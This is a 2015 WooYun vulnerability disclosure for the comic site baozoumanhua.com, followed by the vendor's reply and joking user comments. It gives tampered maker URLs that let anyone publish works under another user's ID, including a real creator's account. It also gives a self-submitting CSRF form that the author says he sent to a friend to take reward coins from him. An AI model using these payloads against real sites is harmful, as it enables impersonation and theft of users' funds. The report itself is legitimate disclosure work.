当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094948

漏洞标题:暴走漫画越权发暴漫作品(拿王尼玛帐号测试)利用打赏功能发财致富走上人生巅峰

相关厂商:baozoumanhua.com

漏洞作者: 浅蓝

提交时间:2015-02-01 10:23

修复时间:2015-03-18 10:24

公开时间:2015-03-18 10:24

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-01: 细节已通知厂商并且等待厂商处理中
2015-02-01: 厂商已经确认,细节仅向厂商公开
2015-02-11: 细节向核心白帽子及相关领域专家公开
2015-02-21: 细节向普通白帽子公开
2015-03-03: 细节向实习白帽子公开
2015-03-18: 细节向公众公开

简要描述:

王尼玛 摸摸大

详细说明:

#1.越权提交暴漫作品
登录帐号,打开暴走漫画制作器。然后直接发表并且抓包
有一个POST请求
URL为
http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=hack%E6%B5%85%E8%93%9D&userID=2049405&template_id=&domain=baozou
http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=用户名&userID=用户ID&template_id=&domain=baozou
点击提交 在我的作品中就会又多出一个作品
我在搜狗浏览器中,把baozoumanhua.com 和baozou.com 的cookie清除

BIKOY`)EB%}6OII`E{4(}XH.png


}9RMJX)1_H$7X$S7_2LG4}H.png


现在是退出状态
在username和userid中填上我的用户名和ID

http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=hack%E6%B5%85%E8%93%9D&userID=2049405&template_id=&domain=baozou


TX}F2A4H}~GN6CH]WJ]25BN.png


提交

QF$2EHLK][VGJ7`AT1SEB_D.png


用火狐浏览器登录上我的帐号,可以看到我的作品发表了 正在审核中
然后新注册一个帐号 名为wooyunxxx ID为 8311358
得出如下URL
http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=wooyunxxx&userID=8311358&template_id=&domain=baozou
用没有登录的 搜狗浏览器测试

1`G~51DU}F17P)(KX1~`@[8.png


再回去用火狐浏览器看看

${YMZ}QWB7COC]L`6P%P%}T.png


发表成功了
现在拿王尼玛的帐号试
http://baozou.com/users/124604/articles
用户名:王尼玛 ID:124604
得出如下URL
http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=王尼玛&userID=124604&template_id=&domain=baozou

%)`Q[QH$ZGUKGCE9FN]QSX7.png


刚提交的作品是审核中 所以我看不见

漏洞证明:

#2.利用大赏功能发财致富走上人生巅峰
在打赏别的时候抓包
得出URL http://baozou.com/articles/14545974/reward.json
reward=10
把14545974改成自己作品id就行reward的值必须为 10 或100
写个自动提交表单
<form id="sb" action="http://baozou.com/articles/14545974/reward.json" method="post">
<input type=hidden name="reward" value="100">
<script>
document.getElementById('sb').submit();
</script>
</form>
保存到网站里,发给一朋友。

MH8`NVISX_TF7HXRL_KPLF2.png


坑了300尼玛B 哇哈哈哈哈

修复方案:

不造~

版权声明:转载请注明来源 浅蓝@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-02-01 10:35

厂商回复:

唉唉唉

最新状态:

暂无

漏洞评价:

评论

  1. 2015-02-01 10:25 | 蛇精病 ( 路人 | Rank:23 漏洞数:10 | 你连棒棒糖都没有,还谈什么狗屁爱情?)

    沙发

  2. 2015-02-01 10:36 | vipons ( 普通白帽子 | Rank:284 漏洞数:65 | *^◎^*)

    王尼玛看到了后茶不思饭不想,直接20斤瘦身成功...

  3. 2015-02-01 10:36 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    哈哈@暴走漫画 你肿么了

  4. 2015-02-01 10:44 | 蛇精病 ( 路人 | Rank:23 漏洞数:10 | 你连棒棒糖都没有,还谈什么狗屁爱情?)

    @暴走漫画 我悄悄告诉你 这家伙叫浅蓝 你下次在节目的里可以恶搞他 不用给我留面子 (~ o ~)~zZ

  5. 2015-02-01 11:28 | 你大爷在此 百无禁忌 ( 路人 | Rank:10 漏洞数:6 | Hello 各位小伙伴们 大家好 我是王尼玛)

    荆轲刺秦王 ...

  6. 2015-02-01 11:43 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:19 | 么么哒,呵呵哒,么蛤蛤~)

    越权发布要求吱吱摘下口罩

  7. 2015-02-01 11:45 | 暴走漫画(乌云厂商)

    昨天连夜修好,为了乌云审核通过,又故意打开漏洞的我也是醉了

  8. 2015-02-01 12:10 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    @暴走漫画 - -昨晚没睡啊

  9. 2015-02-01 12:16 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:19 | 么么哒,呵呵哒,么蛤蛤~)

    @暴走漫画 荆轲刺秦王

  10. 2015-02-01 13:05 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    @疯狗 http://www.wooyun.org/bugs/wooyun-2015-095014/trace/95163b5f923c90d9cdee2ffe12f5a7bd 求审核

  11. 2015-02-21 13:21 | GuoKer(ZhuLiu) ( 普通白帽子 | Rank:168 漏洞数:21 | 在校学生党的路过 霸气侧漏)

    女性的乳房到底属于谁?

  12. 2015-02-21 14:53 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    话说我怎么赶脚这个属于csrf啊

  13. 2015-02-21 15:04 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    @小龙 刷金币的是csrf

  14. 2015-03-18 12:34 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    我去,故意再去打开漏洞。厂商真给力。

  15. 2015-03-18 13:35 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    @明月影 修好了再开是因为怕审核测试时复现不了 漏洞不能通过 懂么?

  16. 2015-03-18 14:50 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    @浅蓝 。。。